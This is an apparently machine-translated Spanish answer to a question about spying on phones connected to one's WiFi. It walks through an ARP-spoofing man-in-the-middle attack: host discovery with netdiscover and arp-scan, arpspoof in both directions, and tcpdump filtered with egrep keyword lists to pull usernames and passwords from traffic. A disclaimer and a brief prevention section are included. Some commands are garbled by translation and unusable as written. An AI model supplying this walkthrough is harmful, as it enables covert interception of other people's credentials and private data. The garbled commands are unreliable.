¿Cómo puedo espiar los teléfonos conectados a mi punto de acceso WiFi?
DESCARGO DE RESPONSABILIDAD: Las técnicas descritas y presentadas aquí tienen fines educativos.
Solo porque alguien conectado a su WiFi / Red con su permiso (Abierto | Cerrado) no le da ninguna tarjeta gratuita para rastrear ninguno de sus datos sin ningún consentimiento o permiso previo por escrito, consulte las leyes antes de intentar cualquier técnica descrita aquí.
- ¿Cuántos dispositivos a la vez se pueden conectar a un punto de acceso móvil?
- Cómo transferir un archivo a través de una conexión WiFi
- Al elegir un canal 802.11g para una red WiFi, suponiendo que se hayan tomado todos los canales que no se superponen, ¿es mejor elegir un canal que se superponga con menos redes o un canal que se superponga con más redes pero menos completamente?
- ¿Por qué se puede rastrear la IP en mi computadora portátil aunque estoy usando Orbot en mi teléfono inteligente (como un punto de acceso WiFi)?
- Cómo recuperar una contraseña de Wi-Fi olvidada cuando no está conectado
Seamos específicos sobre lo que puedes espiar.
- Llamada telefónica ?
- Mensajes de texto)?
- ¿Mensaje de voz?
- Registro de llamadas?
- Video, fotos?
- Sitio web visitado / nombre de usuario y contraseña de correo electrónico?
Antes de lanzar o proteger cualquier ataque espía, debe comprender cómo funciona la telecomunicación en las diferentes capas.
Es imposible rastrear cualquier elemento del n. ° 1 al n. ° 5 sin utilizar otras técnicas, ya que las llamadas regulares de teléfono móvil se realizan a través de la torre celular más cercana y no por su WiFi, al igual que el correo de voz y los mensajes de texto, etc.
Sin embargo, los sitios web visitados, como Facebook, Twitter, Gmail, eBay, Amazon, como el nombre de usuario y la contraseña, y otros datos POST | GET se pueden rastrear desde una red inalámbrica o cableada.
Sé que el ataque Man-In-The-Middle se menciona demasiado aquí, pero no veo dónde se explica a fondo.
El hecho de que haya visto algunos videos sobre BackTrack , el ataque Kali Linux Man-in-The-Middle no significa que funcione al 100% ni lo convierta en un mejor hacker, es posible que esté infringiendo las leyes que lo pueden meter en problemas sin saberlo, tenga cuidado !
¿Por qué el hombre en el medio ataque es toro?
PRUEBA DE SANIDAD: ¿Qué haría si su navegador web le notificara que el sitio web que está a punto de visitar no es confiable y peligroso?
Si no acepta continuar navegando en sitios web no confiables y cierra el navegador, sus técnicas para rastrear los datos enviados a través de SSL no funcionarán.
Esta es la misma razón por la que se le pidió que apagara su antivirus en el host de Victim antes de iniciar un MITM . Simplemente porque la mayoría de los antivirus vienen con las reglas predeterminadas de firewall que pueden detener el ataque MITM. Entonces es una tontería decirle a una víctima “Hey, apague su firewall para que pueda realizar un ataque MITM en su computadora” para desactivar su seguridad ya que cada sistema operativo viene con un conjunto mínimo de políticas de seguridad predeterminadas.
Sé que estás pensando eso; La combinación con SSLStrip funcionará. ¡Sí! eso funcionará para aquellas personas a las que no les importa escribir información en ningún sitio web que no muestre un https seguro, porque las técnicas SSLStrip eliminarán la ‘ s’ de https: // , por lo tanto, el sitio web de Facebook se verá como
- http: // www.facebook.com
en lugar de
- https: //www.facebook.com
¿Por qué alguien iniciaría sesión en una cuenta segura, con un enlace no seguro?
Configuración: Ataque el enrutador, NO el host.
Su enrutador ( también conocido como Real Router ) es su puerta de enlace donde todos los hosts que están conectados a su WiFi envían y reciben sus DATOS.
Analogía : si pudieras instalar una cámara especial en el pomo de tu puerta, esto te permitirá ver a todos los que tocan el pomo de la puerta o entran a tu casa. ¿Qué sucede si esta cámara especial tiene funciones inversas, funciones de rayos X y puede detectar y mostrar cada objeto que lleva cualquier persona que entre o salga de su edificio ? Así es como funciona este ataque, con una cámara especial que mira o graba todos los datos que entran por su puerta (enrutador).
Hackear tu propio enrutador antes que Bad Guy.
¿Qué sucede si puede fingir que es el Enrutador real y ser presentado al host (s) como un Enrutador legítimo para engañar a todos los dispositivos conectados y enviarle DATOS al ” Enrutador falso”?
Fake Router guardará todos los DATOS interceptados para la búsqueda del tesoro más adelante y redirigirá los DATOS originales al Enrutador real para la entrega adecuada a su destino final.
¿Cómo funciona?
Normalmente, cuando un Enrutador Real recibe respuesta para el host de la víctima desde Internet o un sistema, envía los DATOS al host de la víctima. Usando el mismo método fingiendo ser el anfitrión de la víctima y Real Router le enviará todos los DATOS, guardará los DATOS interceptados y redirigirá los DATOS originales recibidos al anfitrión de la víctima real y viceversa.
El atacante leerá el registro interceptado guardado y buscará y encontrará sus tesoros (nombre de usuario, contraseña, lo que sea, etc.).
DATOS DE SNIFFING Ejemplo # 1:
¿Por qué atacar los datos enviados a través del navegador (ataques MITM) cuando se puede rastrear todo el grupo de datagramas de una red?
La mayoría de las aplicaciones de telefonía móvil se vuelven a autenticar una vez que hay conexión a Internet, lo que significa que envían DATOS de autenticación a sus servidores que a veces contienen nombre de usuario y contraseña no cifrados o cifrados tan pronto como se conecta un teléfono móvil y se detecta la presencia de Internet. Todos los DATOS de autenticación pueden ser interceptados y falsificados, reenviados al servidor para volver a autenticarse como lo haría un cliente legítimo.
¿Estás pensando cómo es eso posible? Sí , ARPSpoof distribuido por DSniff le permite hacer exactamente eso. Necesitará otras herramientas y técnicas para descifrar cualquier DATO cifrado sobre la marcha, ¡y ese es otro tema!
Para tener una idea, pongamos esto en un pequeño laboratorio muy pequeño, usando elementos que ya tienes si estás leyendo esto.
Requisito:
- Su Wifi / Enrutador.
- Tu móvil – víctima.
- Su computadora portátil (linux): atacante.
El propósito de este laboratorio es mostrarle cuán fácil cualquier Huésped que permitió en su red puede explotar su red y recibir sus datos sin su conocimiento.
¿POR QUÉ ES ES PELIGROSO?
¿Solo si pudieras imaginar a un atacante sentado en el lobby de un hotel, en la sala de espera del hospital, en Starbucks con acceso wifi gratuito o en el wifi de tu casa, explotar la red e interceptar todos los datos que entran y salen de ese segmento de red?
En este pequeño laboratorio, conectará su teléfono móvil a su wifi como lo hace normalmente, y también conectará su computadora portátil a su wifi como lo harían sus clientes / invitados / clientes en su casa, sala de espera o lobby en su lugar de trabajo. ¡Este invitado es un atacante potencial!
OBJETIVOS
- Podrá rastrear SU paquete viajando desde su teléfono móvil a través de su enrutador hacia el mundo (internet) como lo haría cualquier atacante.
- Y aprenda un método de prevención para mitigar dicho ataque.
Paso 1:
El atacante abre una terminal y escanea tu red para encontrar la dirección IP objetivo / víctima y MAC.
Sin usar ninguna herramienta, para localizar el host (s) en vivo, el atacante puede hacer:
Paso 1a:
ip addr show
# Muestra la dirección IP con CIDR, es decir, / 24 o / 16 o
ifconfig
# lista de direcciones IP y nombre de interfaz,
Paso 1b: ahora haga ping a las direcciones IP para descubrir hosts en vivo usando el comando one-liner sin herramienta de terceros.
for i in {1..254}; do ping -c 1 -W 1 192.168.0.$i | grep 'from'; done
Por supuesto, podemos usar cualquier herramienta de terceros para lograr resultados de descubrimiento de host similares o mejores, como los siguientes:
apt-get install netdiscover -y
netdiscover -i wlan0
arp-scan 192.168.1.0/24 -interface wlan0
Los comandos anteriores enumeran todos los hosts en vivo? ¡Ya que es difícil atacar a cualquier host fuera de línea! con el comando anterior, obtiene nombres de hosts conectados , dirección IP y mac , nombre para una fácil identificación, por ejemplo:
netdiscover -i wlan0
192.168.0.1 00: 11: 22: 33: 47: xx: Enrutador real
192.168.0.21 00: 11: 22: 33: 44: xx: iPhone de la víctima
192.168.0.22 00: 11: 22: 33: 40: x0: escritorio de la víctima
192.168.0.23 00: 11: 22: 33: 49: xx: POS de la víctima
192.168.0.23 00: 11: 22: 33: 48: xx: Impresora de la víctima
Ahora que descubrió los hosts conectados, la dirección IP, MAC, es hora de cambiar su NIC de interfaz al modo PROMISCUOUS. Recuerde que el atacante está interesado en atacar el enrutador, de esta manera los datos de otros dispositivos enviados al enrutador real se envían primero al atacante, luego el atacante lo reenviará al enrutador y viceversa.
¿Qué es el modo prometedor?
El modo promiscuo permite que la interfaz (si es compatible) vea todos los tráficos en la red en todas las direcciones. Por lo tanto, el atacante podrá ver datos de un segmento de red, incluido el host que la víctima envía y recibe.
Paso 2: modo promisorio
Compruebe si su interfaz PROMISC está activada con
ifconfig wlan0
# si no está activado, active el modo promisc con:
ifconfig wlan0 PROMISC on
El atacante lo revisa nuevamente para asegurarse, ¡porque las cosas están a punto de caer!
ifconfig wlan0
PROMISC mode is ON.
Paso 3. Olfatear los paquetes ─ búsqueda del tesoro digital
~ # apt-get install arpspoof -y #si aún no está instalado
~ # arpspoof -t dirección-ip-myphone-dirección-ip-mi-router
~ # arpspoof -t mi-enrutador-dirección-IP myphone-dirección-ip
Ahora siéntese y observe los tráficos volando a través del cable o capturados para su posterior análisis; El uso de este pequeño comando puede permitirle ver lo que sucede en tiempo real:
# tcpdump host myphone-ip-address y no arp
O el atacante puede simplemente conectarse a su red, lanzar el ataque, salir a fumar un cigarrillo (evitando estar en la escena) mientras guarda los datos para su uso posterior con un comando similar a este:
# tcpdump host myphone-ip-address y no arp -w victim.pcap
Para capturar o guardar otros datos, sustituya la dirección IP con myphone-ip-address
¿Qué datos se capturan?
Datos cifrados y no cifrados enviados y recibidos al enrutador de las víctimas, esto incluye nombre de usuario, contraseña, información de tarjeta de crédito, etc.
Sin embargo, los datos como SMS, conversación telefónica o medios de comunicación que viajan a través de sitios celulares no se pueden rastrear a través de la red sin emplear otras técnicas.
Para ver los datos habitualmente analizados en tiempo real, abra otra terminal y haga lo siguiente:
tcpdump puerto http o puerto https o puerto ftp o puerto smtp \
o port imap o port pop3 -l -A | egrep -i \
‘pass = | pwd = | log = | login = | user = | username = | pw = | passw = | passwd = \
| contraseña = | contraseña: | usuario: | nombre de usuario: | contraseña: | inicio de sesión: | contraseña | usuario ‘\
–Color = auto –line-buffer -B20
o vea los DATOS ASCII no encriptados como en su red con:
tcpdump puerto http o puerto ftp o puerto smtp \
o port imap o port pop3 -l -A | cuerdas | \
egrep -i ‘pass = | pwd = | log = | login = | user = | username = \
| pw = | passw = | passwd = | contraseña = | pass: | usuario: | nombre de usuario: \
| contraseña: | inicio de sesión: | contraseña | usuario ‘–color = auto –line-buffered -B20
NOTA: Ajuste el puerto según sea necesario, por ejemplo, para detectar el tráfico web cifrado, agregue https
Vaya a cualquier sitio web en su teléfono u otra computadora portátil conectada, navegue, ingrese datos, haga clic en enviar y mire su terminal para obtener la información enviada.
Esto, por supuesto, garantiza que el navegador host de la víctima no tenga ningún conocimiento de detección, por lo que no se muestra ningún error de desajuste del certificado.
MÉTODOS DE PREVENCIÓN
Si bien existen muchos métodos para prevenir este tipo de ataques. El método más simple es:
- Defina lo que su invitado puede ver o tener acceso en su red
- Dar al invitado una subred de dirección IP diferente
- VLAN su red, su invitado NUNCA debería poder hacer ping a ningún dispositivo en otra red que no sea GUEST.
- Configurar firewall y reglas personalizadas para detectar y mitigar estos ataques
Por ejemplo, cuando un invitado se conecta a mi red, se le emite una dirección IP como 10.10.15.xxx a 10.10.15.xxx con el enrutador predeterminado de la red de invitados de 10.10.15. 1 y red doméstica en 192.168.100.xxx a 192.168.100.xxx con puerta de enlace predeterminada de la red doméstica de 192.168.100.1
Todos los invitados o posibles atacantes siempre estarán en la red 10.10.15.0 y no podrán ver a nadie en 192.168.100.xxx ni rastrear ningún paquete que vaya a 192.168.100.1, si se detecta alguna actividad como el escaneo, el firewall se desconectará y registrará dicho evento bloquear la ip por x cantidad de horas en la red.